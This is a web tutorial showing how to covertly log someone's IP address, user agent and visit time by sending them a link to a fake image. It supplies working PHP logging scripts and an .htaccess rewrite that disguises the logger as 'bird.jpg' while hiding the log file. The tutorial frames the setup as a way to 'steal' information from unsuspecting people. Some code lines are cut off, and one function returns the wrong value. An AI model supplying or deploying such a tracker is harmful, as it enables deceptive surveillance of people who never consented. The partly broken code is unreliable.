Penetration TestingProtection

How to Steal IP Address via Image

Today we are going to steal someone’s IP Address by sending them an image URL, In this article, we’re going to steal someone’s IP Address through an image URL, that can be hosted on any free web hosting or VPS.

How to Steal IP Address via Image

STEP 1

Create a file name functions.php

Code:

<?php function getBrowser() { if (isset($_SERVER['HTTP_USER_AGENT']) && !empty($_SERVER['HTTP_USER_AGENT'])) { return $_SERVER['HTTP_USER_AGENT']; } else { return "Unknown User-Agent"; } }function getIP() {

if (function_exists('apache_request_headers')) {

$headers = apache_request_headers();

} else {

$headers = $_SERVER;

}

if ( array_key_exists( 'X-Forwarded-For', $headers ) && filter_var( $headers['X-Forwarded-For'], FILTER_VALIDATE_IP, FILTER$

return $headers['X-Forwarded-For'];

} elseif ( array_key_exists( 'HTTP_X_FORWARDED_FOR', $headers ) && filter_var( $headers['HTTP_X_FORWARDED_FOR'], FILTER_VAL$

return $headers['HTTP_X_FORWARDED_FOR'];

} else {

return filter_var( $_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4 );

}

}

function getReferer() { if (isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['REMOTE_ADDR'])) { return $_SERVER['REMOTE_ADDR']; } else { return "Unknown Referer"; } } ?>

STEP 2

Create another file named log.php

Code:
<?php include 'functions.php';$browser = getBrowser();

$date    = date ('m/j/y g:i A');

$ip      = getIP();

$referer = getReferer();

$log     = fopen('logs.txt', 'a'); fwrite($log, '['.$date.'] '.$browser.'|'.$ip.'|'.$referer."rn"); fclose($log); echo '<img src="birdy.jpg">'; ?>

STEP 3

Create a file named .htaccess

Code:
Options All -Indexes

RewriteEngine on RewriteRule ^bird.jpg$ log.php

<Files *.txt> Order Deny,Allow Deny from all </Files>

<files ~ "^.*.([Hh][Tt][Aa])"> order allow,deny deny from all satisfy all </files>

STEP 4

  1. Create an empty text file, and name it logs.txt
  2. Create an empty text file, and rename it to bird.jpg
  3. Upload a JPG file as birdy.jpg

Note: These can be named anything you want, this is just an example.

Anytime someone goes to bird.jpg on your server, it will load log.php, but the URL will still show as bird.jpg

The log.php file will take the user’s information, save it to a text file, and display birdy.jpg so that when we link the person, an actual image will still show.

No one will be able to access the logs.txt file. The only way to read it would be to log in to your host/VPS and view it from there, so your logs are secured.

Note: The .htaccess file is essential for this to work. The .htaccess file is also protected so that no one can view it. I suggest you test the script out yourself and ensure you have your webserver properly setup to use .htaccess files, because I know some webservers and hosts do not have .htaccess files enabled by default. PM me if you need help setting this up.

Related Articles

Back to top button